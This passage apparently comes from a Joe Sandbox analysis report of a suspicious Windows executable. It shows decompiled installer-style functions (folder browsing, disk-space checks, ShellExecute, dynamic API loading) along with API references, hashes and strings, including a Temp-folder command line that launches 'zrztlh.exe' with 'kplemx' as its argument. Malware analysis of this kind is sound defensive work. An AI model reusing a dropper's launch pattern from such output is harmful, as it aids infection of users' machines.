                												_t289 = _t289 + 1;
                												__eflags = _t289;
                											}
                											_t217 = _t217 + 1;
                											__eflags = _t217 - _t282;
                										} while (_t217 < _t282);
                										goto L72;
                									}
                								}
                							}
                							__eflags = _a12 - 0x3f9;
                							if(_a12 != 0x3f9) {
                								goto L89;
                							}
                							__eflags = _a12 >> 0x10 - 1;
                							if(_a12 >> 0x10 != 1) {
                								goto L89;
                							}
                							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                							__eflags = _t227 - 0xffffffff;
                							if(_t227 == 0xffffffff) {
                								goto L89;
                							}
                							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                							__eflags = _t283 - 0xffffffff;
                							if(_t283 == 0xffffffff) {
                								L54:
                								_t283 = 0x20;
                								L55:
                								E00401299(_t283);
                								SendMessageA(_a4, 0x420, _t315, _t283);
                								_a12 = 1;
                								_a16 = _t315;
                								_a8 = 0x40f;
                								goto L56;
                							}
                							_t231 = _v20;
                							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                								goto L55;
                							}
                							goto L54;
                						}
                						goto L28;
                					}
                				} else {
                					 *0x423f80 = _a4;
                					_t247 =  *0x423f4c; // 0x3
                					_t285 = 2;
                					_v28 = 0;
                					_v16 = _t285;
                					 *0x420524 = GlobalAlloc(0x40, _t247 << 2);
                					_t250 = LoadBitmapA( *0x423f20, 0x6e);
                					 *0x420518 =  *0x420518 | 0xffffffff;
                					_v24 = _t250;
                					 *0x420520 = SetWindowLongA(_v8, 0xfffffffc, E00404DEF);
                					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                					 *0x42050c = _t252;
                					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                					SendMessageA(_v8, 0x1109, _t285,  *0x42050c);
                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                						SendMessageA(_v8, 0x111b, 0x10, 0);
                					}
                					DeleteObject(_v24);
                					_t286 = 0;
                					do {
                						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                						if(_t258 != _t315) {
                							if(_t286 != 0x20) {
                								_v16 = _t315;
                							}
                							_push(_t258);
                							_push(_t315);
                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B16(_t286, _t315, _t320)), _t286);
                						}
                						_t286 = _t286 + 1;
                					} while (_t286 < 0x21);
                					_t317 = _a16;
                					_t287 = _v16;
                					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                					_push(0x15);
                					E00403EF5(_a4);
                					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                					_push(0x16);
                					E00403EF5(_a4);
                					_t318 = 0;
                					_t288 = 0;
                					_t328 =  *0x423f4c - _t318; // 0x3
                					if(_t328 <= 0) {
                						L19:
                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t311 = _v32 + 8;
                						_v24 = _t311;
                						do {
                							_t268 = _t311 + 0x10;
                							if( *_t268 != 0) {
                								_v60 = _t268;
                								_t269 =  *_t311;
                								_t302 = 0x20;
                								_v84 = _t288;
                								_v80 = 0xffff0002;
                								_v76 = 0xd;
                								_v64 = _t302;
                								_v40 = _t318;
                								_v68 = _t269 & _t302;
                								if((_t269 & 0x00000002) == 0) {
                									__eflags = _t269 & 0x00000004;
                									if((_t269 & 0x00000004) == 0) {
                										 *( *0x420524 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									} else {
                										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                									}
                								} else {
                									_v76 = 0x4d;
                									_v44 = 1;
                									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									_v28 = 1;
                									 *( *0x420524 + _t318 * 4) = _t274;
                									_t288 =  *( *0x420524 + _t318 * 4);
                								}
                							}
                							_t318 = _t318 + 1;
                							_t311 = _v24 + 0x418;
                							_t331 = _t318 -  *0x423f4c; // 0x3
                							_v24 = _t311;
                						} while (_t331 < 0);
                						if(_v28 != 0) {
                							L20:
                							if(_v16 != 0) {
                								E00403F2A(_v8);
                								_t280 = _v32;
                								_t315 = 0;
                								__eflags = 0;
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E00403F2A(_v12);
                								L89:
                								return E00403F5C(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                • Instruction ID: 4dc87105461fa9cd210088c80ac17c321b9292d6232489b395004e578f78c6e7
                • Opcode Fuzzy Hash: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                • Instruction Fuzzy Hash: F0028EB0E00209AFDB20DF54DD45AAE7BB5EB84315F10817AF610BA2E1D7799A81CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00404333(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                				int _v8;
                				signed int _v12;
                				long _v16;
                				long _v20;
                				char _v24;
                				long _v28;
                				char _v32;
                				intOrPtr _v36;
                				long _v40;
                				signed int _v44;
                				CHAR* _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				CHAR* _v68;
                				void _v72;
                				char _v76;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t75;
                				signed char* _t80;
                				intOrPtr* _t81;
                				int _t86;
                				int _t88;
                				int _t100;
                				signed int _t105;
                				char* _t110;
                				intOrPtr _t112;
                				intOrPtr _t113;
                				intOrPtr* _t127;
                				intOrPtr _t135;
                				signed int _t139;
                				signed int _t144;
                				CHAR* _t150;
                
                				_t75 =  *0x41fd00;
                				_v36 = _t75;
                				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x424000;
                				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                				if(_a8 == 0x40b) {
                					E004053A6(0x3fb, _t150);
                					E00405D03(_t150);
                				}
                				if(_a8 != 0x110) {
                					L8:
                					if(_a8 != 0x111) {
                						L20:
                						if(_a8 == 0x40f) {
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							_t144 = _t143 | 0xffffffff;
                							E004053A6(0x3fb, _t150);
                							if(E004056C8(_t169, _t150) == 0) {
                								_v8 = 1;
                							}
                							E00405AF4(0x41f4f8, _t150);
                							_t80 = E0040567B(0x41f4f8);
                							if(_t80 != 0) {
                								 *_t80 =  *_t80 & 0x00000000;
                							}
                							_t81 = E00405DDA(0);
                							if(_t81 == 0) {
                								L29:
                								_t86 = GetDiskFreeSpaceA(0x41f4f8,  &_v20,  &_v28,  &_v16,  &_v40);
                								__eflags = _t86;
                								if(_t86 == 0) {
                									goto L32;
                								}
                								_t100 = _v20 * _v28;
                								__eflags = _t100;
                								_t144 = MulDiv(_t100, _v16, 0x400);
                								goto L31;
                							} else {
                								_push( &_v32);
                								_push( &_v24);
                								_push( &_v44);
                								_push(0x41f4f8);
                								if( *_t81() == 0) {
                									goto L29;
                								}
                								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
                								L31:
                								_v12 = 1;
                								L32:
                								if(_t144 < E00404741(5)) {
                									_v8 = 2;
                								}
                								_t135 =  *0x4236fc; // 0x74f2a0
                								if( *((intOrPtr*)(_t135 + 0x10)) != 0) {
                									E0040468C(0x3ff, 0xfffffffb, _t87);
                									if(_v12 == 0) {
                										SetDlgItemTextA(_a4, 0x400, 0x41f4e8);
                									} else {
                										E0040468C(0x400, 0xfffffffc, _t144);
                									}
                								}
                								_t88 = _v8;
                								 *0x423fc4 = _t88;
                								if(_t88 == 0) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                									_v8 = 0;
                								}
                								E00403F17(0 | _v8 == 0x00000000);
                								if(_v8 == 0 &&  *0x42051c == 0) {
                									E004042C8();
                								}
                								 *0x42051c = 0;
                								goto L46;
                							}
                						}
                						_t169 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L46;
                						}
                						goto L22;
                					}
                					_t105 = _a12 & 0x0000ffff;
                					if(_t105 != 0x3fb) {
                						L12:
                						if(_t105 == 0x3e9) {
                							_t139 = 7;
                							memset( &_v72, 0, _t139 << 2);
                							_t143 = 0x420530;
                							_v76 = _a4;
                							_v68 = 0x420530;
                							_v56 = E00404626;
                							_v52 = _t150;
                							_v64 = E00405B16(0x3fb, 0x420530, _t150);
                							_t110 =  &_v76;
                							_v60 = 0x41;
                							__imp__SHBrowseForFolderA(_t110, 0x41f900, _v12);
                							if(_t110 == 0) {
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t110);
                								E004055E7(_t150);
                								_t112 =  *0x423f28; // 0x74d188
                								_t113 =  *((intOrPtr*)(_t112 + 0x11c));
                								if(_t113 != 0 && _t150 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                									_push(_t113);
                									_push(0);
                									E00405B16(0x3fb, 0x420530, _t150);
                									_t143 = 0x422ec0;
                									if(lstrcmpiA(0x422ec0, 0x420530) != 0) {
                										lstrcatA(_t150, 0x422ec0);
                									}
                								}
                								 *0x42051c =  *0x42051c + 1;
                								SetDlgItemTextA(_a4, 0x3fb, _t150);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) {
                						goto L46;
                					}
                					_a8 = 0x40f;
                					goto L12;
                				} else {
                					_t143 = GetDlgItem(_a4, 0x3fb);
                					if(E00405654(_t150) != 0 && E0040567B(_t150) == 0) {
                						E004055E7(_t150);
                					}
                					 *0x4236f8 = _a4;
                					SetWindowTextA(_t143, _t150);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E00403EF5(_a4);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E00403EF5(_a4);
                					E00403F2A(_t143);
                					_t127 = E00405DDA(7);
                					if(_t127 == 0) {
                						L46:
                						return E00403F5C(_a8, _a12, _a16);
                					}
                					 *_t127(_t143, 1);
                					goto L8;
                				}
                 			}

                APIs
                • GetDlgItem.USER32 ref: 0040437E
                • SetWindowTextA.USER32(00000000,?), ref: 004043AA
                • SHBrowseForFolderA.SHELL32(?,0041F900,?), ref: 0040445F
                • CoTaskMemFree.OLE32(00000000), ref: 0040446A
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00420530,00000000,?,?), ref: 0040449C
                • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx), ref: 004044A8
                • SetDlgItemTextA.USER32 ref: 004044B8
                  • Part of subcall function 004053A6: GetDlgItemTextA.USER32 ref: 004053B9
                  • Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                  • Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                  • Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                  • Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                • GetDiskFreeSpaceA.KERNEL32(0041F4F8,?,?,0000040F,?,00000000,0041F4F8,0041F4F8,?,?,000003FB,?), ref: 0040455B
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404571
                • SetDlgItemTextA.USER32 ref: 004045C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 2246997448-1576356659
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00402078(void* __eflags) {
                				void* _t44;
                				intOrPtr* _t48;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				intOrPtr* _t54;
                				signed int _t58;
                				intOrPtr* _t59;
                				intOrPtr* _t62;
                				intOrPtr* _t64;
                				intOrPtr* _t66;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				int _t75;
                				signed int _t81;
                				intOrPtr* _t88;
                				void* _t95;
                				void* _t96;
                				void* _t100;
                
                				 *(_t100 - 0x30) = E00402A85(0xfffffff0);
                				_t96 = E00402A85(0xffffffdf);
                				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A85(2);
                				 *((intOrPtr*)(_t100 - 0x3c)) = E00402A85(0xffffffcd);
                				 *((intOrPtr*)(_t100 - 0x34)) = E00402A85(0x45);
                				if(E00405654(_t96) == 0) {
                					E00402A85(0x21);
                				}
                				_t44 = _t100 + 8;
                				__imp__CoCreateInstance(0x407380, _t75, 1, 0x407370, _t44);
                				if(_t44 < _t75) {
                					L12:
                					 *((intOrPtr*)(_t100 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t48 =  *((intOrPtr*)(_t100 + 8));
                					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407390, _t100 - 8);
                					if(_t95 >= _t75) {
                						_t52 =  *((intOrPtr*)(_t100 + 8));
                						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                						_t54 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                						_t81 =  *(_t100 - 0x14);
                						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                						if(_t58 != 0) {
                							_t88 =  *((intOrPtr*)(_t100 + 8));
                							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                							_t81 =  *(_t100 - 0x14);
                						}
                						_t59 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x3c)))) != _t75) {
                							_t71 =  *((intOrPtr*)(_t100 + 8));
                							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x3c)),  *(_t100 - 0x14) & 0x000000ff);
                						}
                						_t62 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                						_t64 =  *((intOrPtr*)(_t100 + 8));
                						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x34)));
                						if(_t95 >= _t75) {
                							 *0x40a800 = _t75;
                							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x40a800, 0x400);
                							_t69 =  *((intOrPtr*)(_t100 - 8));
                							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x40a800, 1);
                						}
                						_t66 =  *((intOrPtr*)(_t100 - 8));
                						 *((intOrPtr*)( *_t66 + 8))(_t66);
                					}
                					_t50 =  *((intOrPtr*)(_t100 + 8));
                					 *((intOrPtr*)( *_t50 + 8))(_t50);
                					if(_t95 >= _t75) {
                						_push(0xfffffff4);
                					} else {
                						goto L12;
                					}
                				}
                				E00401423();
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t100 - 4));
                				return 0;
                 			}

                APIs
                • CoCreateInstance.OLE32(00407380,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020CB
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,0040A800,00000400,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402187
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402103
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-1943935188
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405DDA(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				CHAR* _t7;
                				signed int _t9;
                
                				_t9 = _a4 << 3;
                				_t2 = _t9 + 0x409298; // 0x4b004178
                				_t7 =  *_t2;
                				_t5 = GetModuleHandleA(_t7);
                				if(_t5 != 0) {
                					L2:
                					_t3 = _t9 + 0x40929c; // 0x454e5245
                					return GetProcAddress(_t5,  *_t3);
                				}
                				_t5 = LoadLibraryA(_t7);
                				if(_t5 != 0) {
                					goto L2;
                				}
                				return _t5;
                 			}

                APIs
                • GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                • LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                • GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: AddressHandleLibraryLoadModuleProc
                • String ID:
                • API String ID: 310444273-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E004026A1(char __ebx, char* __edi, char* __esi) {
                				void* _t19;
                
                				if(FindFirstFileA(E00402A85(2), _t19 - 0x194) != 0xffffffff) {
                					E00405A52(__edi, _t6);
                					_push(_t19 - 0x168);
                					_push(__esi);
                					E00405AF4();
                				} else {
                					 *__edi = __ebx;
                					 *__esi = __ebx;
                					 *((intOrPtr*)(_t19 - 4)) = 1;
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t19 - 4));
                				return 0;
                 			}

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026B0
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0040403D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                				char* _v8;
                				signed int _v12;
                				void* _v16;
                				struct HWND__* _t52;
                				intOrPtr _t71;
                				intOrPtr _t85;
                				long _t86;
                				int _t98;
                				struct HWND__* _t99;
                				signed int _t100;
                				intOrPtr _t107;
                				intOrPtr _t109;
                				int _t110;
                				signed int* _t112;
                				signed int _t113;
                				char* _t114;
                				CHAR* _t115;
                
                				if(_a8 != 0x110) {
                					if(_a8 != 0x111) {
                						L11:
                						if(_a8 != 0x4e) {
                							if(_a8 == 0x40b) {
                								 *0x420510 =  *0x420510 + 1;
                							}
                							L25:
                							_t110 = _a16;
                							L26:
                							return E00403F5C(_a8, _a12, _t110);
                						}
                						_t52 = GetDlgItem(_a4, 0x3e8);
                						_t110 = _a16;
                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                							_v12 = _t100;
                							_v16 = _t109;
                							_v8 = 0x422ec0;
                							if(_t100 - _t109 < 0x800) {
                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                								SetCursor(LoadCursorA(0, 0x7f02));
                								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                								SetCursor(LoadCursorA(0, 0x7f00));
                								_t110 = _a16;
                							}
                						}
                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                							goto L26;
                						} else {
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                								SendMessageA( *0x423f24, 0x111, 1, 0);
                							}
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                								SendMessageA( *0x423f24, 0x10, 0, 0);
                							}
                							return 1;
                						}
                					}
                					if(_a12 >> 0x10 != 0 ||  *0x420510 != 0) {
                						goto L25;
                					} else {
                						_t112 =  *0x41fd00 + 0x14;
                						if(( *_t112 & 0x00000020) == 0) {
                							goto L25;
                						}
                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                						E00403F17(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                						E004042C8();
                						goto L11;
                					}
                				}
                				_t98 = _a16;
                				_t113 =  *(_t98 + 0x30);
                				if(_t113 < 0) {
                					_t107 =  *0x4236fc; // 0x74f2a0
                					_t113 =  *(_t107 - 4 + _t113 * 4);
                				}
                				_t71 =  *0x423f58; // 0x74eb84
                				_push( *((intOrPtr*)(_t98 + 0x34)));
                				_t114 = _t113 + _t71;
                				_push(0x22);
                				_a16 =  *_t114;
                				_v12 = _v12 & 0x00000000;
                				_t115 = _t114 + 1;
                				_v16 = _t115;
                				_v8 = E00404009;
                				E00403EF5(_a4);
                				_push( *((intOrPtr*)(_t98 + 0x38)));
                				_push(0x23);
                				E00403EF5(_a4);
                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                				E00403F17( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                				_t99 = GetDlgItem(_a4, 0x3e8);
                				E00403F2A(_t99);
                				SendMessageA(_t99, 0x45b, 1, 0);
                				_t85 =  *0x423f28; // 0x74d188
                				_t86 =  *(_t85 + 0x68);
                				if(_t86 < 0) {
                					_t86 = GetSysColor( ~_t86);
                				}
                				SendMessageA(_t99, 0x443, 0, _t86);
                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                				 *0x420510 =  *0x420510 & 0x00000000;
                				return 0;
                 			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: @@$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$N$open
                • API String ID: 3615053054-3243811664
                • Opcode ID: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                • Instruction ID: 2736236621597dd84b1265fd00406a521608d9db3f880d2da7511b3895ae30a3
                • Opcode Fuzzy Hash: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                • Instruction Fuzzy Hash: 0161D1B1A40309BBEB109F60DC45B6A7BB9FB44715F10407AFB05BA2D1C7B8A9518F98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				intOrPtr _t115;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) {
                					_t130 =  *0x423f28; // 0x74d188
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {
